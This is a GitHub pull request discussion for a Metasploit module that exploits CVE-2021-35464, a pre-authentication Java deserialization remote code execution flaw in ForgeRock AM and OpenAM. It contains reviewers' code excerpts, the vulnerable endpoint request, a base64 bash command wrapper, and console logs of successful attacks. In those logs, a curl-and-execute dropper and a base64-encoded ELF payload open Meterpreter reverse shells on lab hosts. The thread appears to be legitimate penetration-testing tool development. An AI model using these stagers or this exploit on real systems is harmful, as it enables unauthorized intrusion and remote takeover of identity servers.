Add module for CVE-2021-35464; pre-auth RCE in ForgeRock OpenAM server
rapid7/metasploit-framework pull request #15386
Opened 2021-07-02 21:10 UTC by bwatters-r7

This module leverages a pre-authentication remote code execution vulnerability
in ForgeRock’s AM identity and access management solution. The vulnerability
arises from a Java deserialization flaw in AM’s implementation of the JATO
framework and can be triggered by a simple one-line GET or POST request to a
vulnerable endpoint. Successful exploitation yields code execution on the
target system.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/multi/http/cve_2021_35464_forgerock_openam`
- [ ] `set RHOST <ip>`
- [ ] `set LHOST <ip>`
- [ ] `set LPORT <port>`
- [ ] `run`
- [ ] **Verify** you get a session
- [ ] **Verify** the thing does not explode

```
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > show options

Module options (exploit/multi/http/cve_2021_35464_forgerock_openam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.134.134  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      7080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local mac
                                         hine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT  8443             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > run

[*] Started reverse TCP handler on 192.168.135.197:8443 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/Zrrhm8JKIL8QB2Q
[*] Local IP: http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q
[*] Generated command stager: ["curl -so /tmp/wMKsYYMP http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q;chmod +x /tmp/wMKsYYMP;/tmp/wMKsYYMP;rm -f /tmp/wMKsYYMP"]
[+] Successfully executed command: curl -so /tmp/wMKsYYMP http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q;chmod +x /tmp/wMKsYYMP;/tmp/wMKsYYMP;rm -f /tmp/wMKsYYMP
[*] Client 192.168.134.134 (curl/7.64.0) requested /Zrrhm8JKIL8QB2Q
[*] Sending payload to 192.168.134.134 (curl/7.64.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.134.134
[*] Command Stager progress - 100.00% done (123/123 bytes)
[*] Meterpreter session 11 opened (192.168.135.197:8443 -> 192.168.134.134:44944) at 2021-07-02 15:59:30 -0500
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 10.9 (Linux 5.8.0-53-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: openam @ localhost (uid=1001, gid=0, euid=1001, egid=0)
meterpreter > 
```

2021-07-02 22:55 UTC, wvu-r7 requested changes
```
modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
```

ForgeRock forked OpenAM to create Access Management (AM). The affected products are ForgeRock AM and OpenAM. Please adjust accordingly.

2021-07-02 22:55 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +          'Arch' => [ARCH_X86, ARCH_X64],
```suggestion
          'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
```

2021-07-02 22:55 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +          },
```suggestion
```

Already the default.

2021-07-02 22:55 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      Opt::RPORT(7080),
```suggestion
      Opt::RPORT(8080),
```

8080 is actually the standard port.

2021-07-02 22:55 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      OptString.new('TARGETURI', [true, 'Base path', '/'])
```suggestion
      OptString.new('TARGETURI', [true, 'Base path', '/openam'])
```

`TARGETURI` should be the context path.

2021-07-02 22:55 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      'vars_get' => {
```suggestion
      'vars_post' => {
```

2021-07-02 22:55 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +        'jato.pageSession' => Base64.urlsafe_encode64(Rex::Text.rand_text_alphanumeric(6..13))
```suggestion
        'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
```

Exploit method is badchar-aware and closer to the source.

2021-07-02 22:55 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    if res && res.code == 302 && res.headers['LOCATION'].include?('base/AMInvalidURL')
```suggestion
    if res && res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
```

2021-07-02 22:55 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      'vars_get' => {
```suggestion
      'vars_post' => {
```

2021-07-02 22:55 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    ysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none')
I assume the [mixin](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/java_deserialization.rb) didn't work?

2021-07-02 23:03 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +#### Ubuntu 20.04.2x64 with Docker version 20.10.2
```suggestion
#### Ubuntu 20.04.2 x64 with Docker version 20.10.2
```

2021-07-02 23:04 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +Navigate to http://<ip_address>:7080/opanam
```suggestion
Navigate to http://<ip_address>:7080/openam
```

2021-07-02 23:05 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +#### Ubuntu 20.04.2x64 with Docker version 20.10.2
```suggestion
#### Ubuntu 20.04.2 x64 with Docker version 20.10.2
```

2021-07-02 23:26 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      Opt::RPORT(7080),
https://backstage.forgerock.com/docs/am/7/reference/am-ports-used.html
https://hub.docker.com/r/openidentityplatform/openam

2021-07-02 23:30 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      OptString.new('TARGETURI', [true, 'Base path', '/'])
https://backstage.forgerock.com/docs/am/6.5/install-guide/#proc-deploy-openam
https://backstage.forgerock.com/docs/am/6.5/install-guide/index.html#avoid-obvious-defaults

2021-07-02 23:36 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    if res && res.code == 302 && res.headers['LOCATION'].include?('base/AMInvalidURL')
```java
  protected void onPageSessionDeserializationException(RequestContext requestContext, ViewBean viewBean, Exception e) throws ServletException, IOException {
    HttpServletRequest httpRequest = requestContext.getRequest();
    AMViewBeanBase.debug.error("VersionServlet.onUncaughtException", e);
    String redirectUrl = VersionViewBean.getCurrentURL(httpRequest) + "/base/AMInvalidURL";

    requestContext.getResponse().sendRedirect(redirectUrl);
    throw new CompleteRequestException();
  }
```

2021-07-06 14:01 UTC, smcintyre-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    ysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none')
Yeah the Mixin won't work for this one because the `Click1` gadget chain unfortunately doesn't have a shell-specific version like the others do. The Mixin won't allow a shell type of `'none'` to avoid allowing users to mistakenly subvert the intention so the old-style Util method needs to be used directly.

2021-07-06 14:35 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      OptString.new('TARGETURI', [true, 'Base path', '/'])
Friendly reminder to update the requests, too.

2021-07-06 16:08 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +
```suggestion
```

2021-07-06 16:09 UTC, wvu-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +
```suggestion
```

2021-07-06 17:42 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      Opt::RPORT(8080),
This will need updating in the docs.

2021-07-06 19:56 UTC, smcintyre-r7 commented
Undrafting this on @bwatters-r7's behalf. I've addressed all of the PR feedback and tested both OpenAM and ForgeRock v6.5.3. I also added steps for building a docker container to host ForgeRock in an environment that's suitable for testing.

2021-07-06 19:57 UTC, wvu-r7 approved these changes

2021-07-08 13:38 UTC, smcintyre-r7 requested changes, later dismissed

2021-07-08 13:38 UTC, smcintyre-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +  include Msf::Exploit::JavaDeserialization
This mixin doesn't appear to be used anywhere since the `Msf::Util` method is used directly. It should be safe to remove this.

2021-07-08 13:38 UTC, smcintyre-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      CheckCode::Safe
If `res` is nil here we should be returning `CheckCode::Unknown`.

2021-07-08 17:20 UTC, gwillcox-r7 commented
Grabbing this at Spencer's request and will make the last few necessary edits and test this so long.

2021-07-08 18:06 UTC, wvu-r7 commented
Great teamwork in this PR! And hats off to @bwatters-r7 for putting this up quickly.

2021-07-08 19:35 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    if res.nil? || res.empty?
```suggestion
    if res.nil?
```

2021-07-09 16:01 UTC, gwillcox-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    if res.nil? || res.empty?
Shouldn't we still fail in the same way if the response is empty though? Last I checked `nil` and `empty` were pretty much the same thing as far as we are concerned, its simply a case of did the server not respond at all or did it respond with an empty response.

2021-07-09 16:02 UTC, gwillcox-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      CheckCode::Safe
Resolved with https://github.com/rapid7/metasploit-framework/pull/15386/commits/8b3d057e9e25c3f340962e5fd906052145a26e24

2021-07-09 16:42 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    if res.nil? || res.empty?
`res` is the response object. You might be thinking of `res.body`.

2021-07-09 17:04 UTC, gwillcox-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    if res.nil? || res.empty?
Ah thats what I was going to check, let me fix that so long :)

2021-07-09 17:30 UTC, gwillcox-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    if res.nil? || res.empty?
Fixed with https://github.com/rapid7/metasploit-framework/pull/15386/commits/89b36bd1b8f8bb703eab5dd10b48430937ccc382

2021-07-09 17:32 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      CheckCode::Unknown("The target server didn't respond!")
`res.body.empty?` _usually_ means the server did respond, but the response body is empty.

2021-07-09 18:13 UTC, gwillcox-r7 requested changes

2021-07-09 18:13 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +1. Perform manual configuration of OpenAM
```suggestion
1. Follow the OpenAM instructions listed above to install OpenAM
1. Follow the `ForgeRock with Docker` instructions above to install ForgeRock.
```

2021-07-09 18:13 UTC, gwillcox-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +  include Msf::Exploit::JavaDeserialization
Resolved with https://github.com/rapid7/metasploit-framework/pull/15386/commits/8b3d057e9e25c3f340962e5fd906052145a26e24

2021-07-09 18:17 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +1. `sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam`
Won't this end up pulling down the latest OpenAM vs the vulnerable one?

```
 ~/git/metasploit-framework │ add_openam_deserialization *4 ?25  sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam
[sudo] password for gwillcox: 
Unable to find image 'openidentityplatform/openam:latest' locally
latest: Pulling from openidentityplatform/openam
```

2021-07-09 18:32 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +1. Follow the manual configuration steps. Automatic configuration appears to fail.
```suggestion
1. Click `Create New Configuration`, not `Create Default Configuration, as automatic configuration appears to fail.
```

2021-07-09 18:59 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +1. Do: `use exploit/multi/http/multi/http/cve_2021_35464_forgerock_openam`
```suggestion
1. Do: `use exploit/multi/http/cve_2021_35464_forgerock_openam`
```

2021-07-09 19:49 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      CheckCode::Unknown("The target server didn't respond!")
Confirmed this change breaks the check:

```
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > check

####################
# Request:
####################
POST /openam/oauth2/..;/ccversion/Version HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

jato.pageSession=cHBwYWh6Wg%3d%3d
####################
# Response:
####################
HTTP/1.1 302
X-Frame-Options: SAMEORIGIN
Cache-Control: private
Location: http://127.0.0.1:8080/openam/base/AMInvalidURL
Content-Length: 0
Date: Fri, 09 Jul 2021 19:48:52 GMT


[*] 127.0.0.1:8080 - Cannot reliably check exploitability. The target server didn't respond!
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) >
```

2021-07-09 20:17 UTC, gwillcox-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +      CheckCode::Unknown("The target server didn't respond!")
Woops, very valid point, my bad! Lets get that fixed and remove that; I'm clearly overlooking things here 😅

2021-07-09 20:21 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    cmd_encapsulated = "bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash"
[Brace expansion](https://www.gnu.org/software/bash/manual/html_node/Brace-Expansion.html) to avoid word splitting by the resulting tokenizer used in the command execution.

https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/cmd/brace.rb

2021-07-09 20:30 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    cmd_encapsulated = "bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash"
https://github.com/openjdk/jdk/blob/d6c0f5fa22d2fc07a4d8957d7ad005c03df9f8d2/src/java.base/share/classes/java/lang/Runtime.java#L359-L419

2021-07-09 20:32 UTC, wvu-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    cmd_encapsulated = "bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash"
FTR, the current invocation does rely on both `bash` and `base64` to be present.

2021-07-09 20:36 UTC, gwillcox-r7 commented
Testing this on the Docker Image 14.6.2 from https://hub.docker.com/r/openidentityplatform/openam/tags?page=1&ordering=last_updated worked fine:

```
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > show options

Module options (exploit/multi/http/cve_2021_35464_forgerock_openam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      7080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local
                                         machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /openam          yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[+] Successfully executed command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwSAAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/olQPJ.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/BFNrG' < '/tmp/olQPJ.b64' ; chmod +x '/tmp/BFNrG' ; '/tmp/BFNrG' ; rm -f '/tmp/BFNrG' ; rm -f '/tmp/olQPJ.b64'
[*] Sending stage (3012548 bytes) to 172.18.0.2
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 2 opened (172.18.0.1:4444 -> 172.18.0.2:52560) at 2021-07-09 15:33:21 -0500

meterpreter > getuid
Server username: openam @ localhost (uid=1001, gid=0, euid=1001, egid=0)
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 9.9 (Linux 5.8.0-59-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > shell
Process 503 created.
Channel 1 created.
uname -a
Linux localhost 5.8.0-59-generic #66~20.04.1-Ubuntu SMP Thu Jun 17 11:14:10 UTC 2021 x86_64 GNU/Linux
pwd
/usr/local/tomcat
exit
meterpreter > 
```

2021-07-09 21:00 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +1. `sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam`
Fixed with Spencer's commit at https://github.com/rapid7/metasploit-framework/pull/15386/commits/fba838f4e89200a32f23465aacc823dd3938f91a

2021-07-09 21:03 UTC, gwillcox-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +    cmd_encapsulated = "bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash"
Seems this was a confusion on my end during local tests with a different shell that did not support brace expansion, and in bash this works as expected. Thanks for the clarification @wvu-r7!

2021-07-09 21:11 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +#### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2
Updating documentation shortly to account for this and other scenario related details.

2021-07-09 21:19 UTC, gwillcox-r7 commented on modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb
> +            vulnerable endpoint. Successful exploitation yields code execution on the target system.
This is in the documentation now, I'm not going to get picky over the module content itself. Marking resolved.

2021-07-09 21:44 UTC, gwillcox-r7 approved these changes

2021-07-09 21:44 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md
> +#### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2
Resolved in https://github.com/rapid7/metasploit-framework/pull/15386/commits/5c8aa9b802db0d1a9aa393a5d9a321c4d5ae89ee

2021-07-09 21:46 UTC, gwillcox-r7 commented
Everything looks good now and I've confirmed this also works against ForgeRock AM. Will land this once all checks pass.

2021-07-09 21:47 UTC, gwillcox-r7 commented
Also no explosions encountered @bwatters-r7 👍 If anything the module runs incredibly smoothly 😄

2021-07-09 22:02 UTC, merged

2021-07-09 22:05 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability
in OpenAM and ForgeRock AM. Succcessful exploitation allows for remote code execution as the user running the OpenAM service.

2021-07-09 22:32 UTC, wvu-r7 commented
Excellent work, team.